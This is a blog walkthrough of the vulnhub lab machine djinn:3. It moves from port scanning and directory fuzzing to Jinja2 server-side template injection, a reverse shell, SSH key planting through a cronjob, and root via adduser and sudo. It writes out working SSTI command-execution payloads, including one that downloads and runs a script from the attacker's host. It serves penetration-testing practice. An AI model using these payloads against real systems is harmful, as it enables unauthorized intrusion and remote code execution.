djinn:3 vulnhub Walkthrough
I am back with another article which is going to be full of new methods and priv. esc. techniques , The only reason I was not writing any blog was this VM ( djinn3 , a very good VM from vulnhub) , and finally after a lot of failure I got root on this VM , Okay so lets start .
walkthrough
IP of the target : 192.168.1.55
As usual I started with nmap scan to find open ports and services running in the system using the command
nmap -sC -sV -Pn 192.168.1.55

I have got so many ports open , may be port 80 can help me with the enumeration so lets start from it.

okay we have a website on port 80 and I tried to visit on every page specified in the nav. bar but got nothing , now its time for directory bruteforce , I personally like wfuzz because of its cleaner interface (you can use any tool you want) .
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --hc 404 http://192.168.1.55/FUZZ
but got nothing instead of /images with a code 301 and /~checkout~ with code 403 then I changed my wordlist to /dirb/big.txt and still I got nothing except /~sys~ which is also forbidden , I don't know if ~checkout~ and ~sys~ directory are going to be useful for me or not , So I proceed with the next port 5000

we have ticketing software , most interesting line I found is "Under Development" which shows that this web app can have security issues , I clicked on open link and found another webpage with get parameter "id "

umm smells like SQL injection but it was not , I tried a lot but got nothing :(
okay next port we have is 31337 , I tried connecting to this port using nc

I tried almost every common username and password but none of them worked , then I start searching on the internet for some common username and password and found one with
username => guest
password => guest
and yes this worked , I was feeling so dumb at this point , How can I forgot such an easy password :(
anyways lets continue with the application we have on port 31337

I can perform so many options here , I started with close ( close an existing ticket)

I tried to close some non existing ticket with id 1234 and got no output next I tried with some valid ticket id I found on port 5000 as 2973 and after this I again visit the page on port 5000 and yes this ticket id is actually deleted.
next option I tried was open a new ticket

again I visited the page on port 5000 and found a new ticket id with title "check" , means this function is working too , I tried including some file name likes /etc/passwd to check if we can get LFI or RFI here , but got nothing , then after spending a lot of time with this application I got nothing .
I again checked nmap scan and found this line 5000/tcp open http Werkzeug
searching on google about this revealed useful information .

umm that was a big hint for me , means the whole application is developed using flask and flask is vulnerable to SSTI attack (Server side template injection attack) and found a GitHub link something like PayloadsAllTheThings and after working on it I found that this application is using jinja2 because if we give input as {{7*'7'}} then output will be 7777777

again I opened the webapp on port 5000 and clicked on link and I got this result.

I was on the right path but "some payloads doesn't work exactly the way are written" , so after a lot of tries to get RCE from SSTI I succeed with payload ,
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}


now I just have to pop the shell , and without any further checking I assumed that this system has php installed in it and I uploaded pentestmonkey reverse shell in /tmp directory and wasted almost 10mins to figure out why this php script is not executing , now I changed my command to
{{config.__class__.__init__.__globals__['os'].popen('ls /usr/bin/').read()}}
and using this I found that python is installed so I can use a python script to pop a shell ( again I was feeling so dumb) , how can I forget to check if php is there or not .

{{config.__class__.__init__.__globals__['os'].popen('wget http://192.168.1.103:8000/exp.py -O /tmp/exp.py').read()}}

opened the webpage on port 5000 and after I clicked on link the my python script is saved to /tmp/ directory

next I started a listener on port 1234 and changed the payload as
{{config.__class__.__init__.__globals__['os'].popen('python /tmp/exp.py').read()}}
and after clicking on link I got the reverse shell :)

popped up the reverse shell :)

and after some enumeration I found two important files in /opt/ directory .

I transferred these files in my local system and de-compiled them with uncompyle6 and as a result I got two .py files .
and after reading the code for so many times I found some important piece of codes
Content of file1 =>


Content of file2 =>

now after understanding these two codes I tried to run pspy in target machine and found that a cronjob is running as user saint ( we have three users , saint mzfr , jack)
and according to the python code I created a json file in /tmp directory with name ****.config.json which will download id_rsa.pub keys to the directory I specified ( so I tried with /home/saint/.ssh/authorized_keys) and yes it worked and now I can get access to user saint .

as we can see that server received a response code 200 , means I am on the right path now with the help of command ssh saint@192.168.1.55 I was in as user saint

now after getting shell of user saint I checked for user privileges using the command sudo -l and found this

it means user saint can add a user , so if we remember the adduser command options then there is a option to specify the gid , So I used the commad
sudo -u root /usr/sbin/adduser yash --gid 0

now after spending some time with the system , I found that I can read /etc/sudoers file and found this interesting thing .

mean we need to create a new user with name jason , okay I did the same thing after changing back to user saint .

now from the sudoers file I know that user jason can run some command without any password as user root, so I take help of gtfobins and finally got root

and this completed our challenge , if you like the walkhthrough then please consider donating us to keep the website advertisement free :)
NOTE : I have blurred most of the code of those two python files and also the name of json file in /tmp directory because I don't want that anybody can get root in just 10-15mins , So my main motive to hide them is I want from you to #try_harder